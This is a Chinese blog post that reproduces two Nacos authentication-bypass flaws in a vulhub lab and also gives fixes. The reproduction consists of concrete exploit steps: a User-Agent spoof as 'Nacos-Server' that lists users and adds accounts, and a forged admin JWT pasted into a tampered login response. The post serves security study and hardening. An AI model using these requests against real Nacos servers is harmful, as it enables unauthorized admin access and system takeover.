内网高频组件漏洞整理-Nacos

发布于 2023-02-22  1738 次阅读


简介:

Nacos是SpringCloudAlibaba架构中最重要的组件。
Nacos 是一个更易于帮助构建云原生应用的动态服务发现、配置和服务管理平台,提供注册中心、配置中心和动态 DNS 服务三大功能。能够无缝对接Springcloud、Spring、Dubbo等流行框架。

环境搭建:

直接使用vulhub的docker环境

接着访问8848端口
http://192.168.161.136:8848/nacos/

环境搭建完成

漏洞复现:

Nacos鉴权绕过

Nacos官方仓库的issue中披露了Nacos存在一个由于不当处理User-Agent导致的鉴权绕过漏洞。

影响版本:

Nacos <= 2.0.0-ALPHA.1(经测试2.1.0也是存在漏洞的)

首先访问
http://xxx.xxx.xxx.xxx/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageSize=10&keyword=
看是否存在未授权访问漏洞
这里我访问
http://192.168.161.136:8848/nacos/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageSize=10&keyword=

存在未授权访问漏洞
接着先查看下存在的用户

http://192.168.161.136:8848/nacos/v1/auth/users?pageNo=1&pageSize=2

这里需要User-Agent的值修改为Nacos-Server


成功查看到用户列表

接着我们请求http://192.168.161.136:8848/nacos/v1/auth/users
post数据
username=test&password=test
User-Agent的值修改为Nacos-Server

成功添加用户


可成功登陆后台

修复:

1、更新nacos到最新版本

2、在conf/application.properties配置中开启鉴权,启用新机制去避免被非法访问

开启鉴权

nacos.core.auth.enabled=true

关闭白名单功能

nacos.core.auth.enable.userAgentAuthWhite=false.

配置键值对 [键值对可以自定义]

nacos.core.auth.server.identity.key=aaa
nacos.core.auth.server.identity.value=bbb

Nacos 身份认证绕过漏洞(QVD-2023-6271)

近日,奇安信CERT监测到Nacos 身份认证绕过漏洞(QVD-2023-6271),开源服务管理平台 Nacos在默认配置下未对 token.secret.key 进行修改,导致远程攻击者可以绕过密钥认证进入后台,造成系统受控等后果。

简单复现:
登陆界面 随便输入账户密码 Burp抓包开启

点击登录

改返回包状态码跟body,状态码改200,body改

{
"accessToken":
"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3NTA4Mzg3N30.mIjNX6MXNF3FgQNTl-FduWpsaTSZrOQZxTCu7Tg46ZU","tokenTtl": 18000,
"globalAdmin": true,"username":"nacos"
}

成功进入后台

届ける言葉を今は育ててる
最后更新于 2023-03-17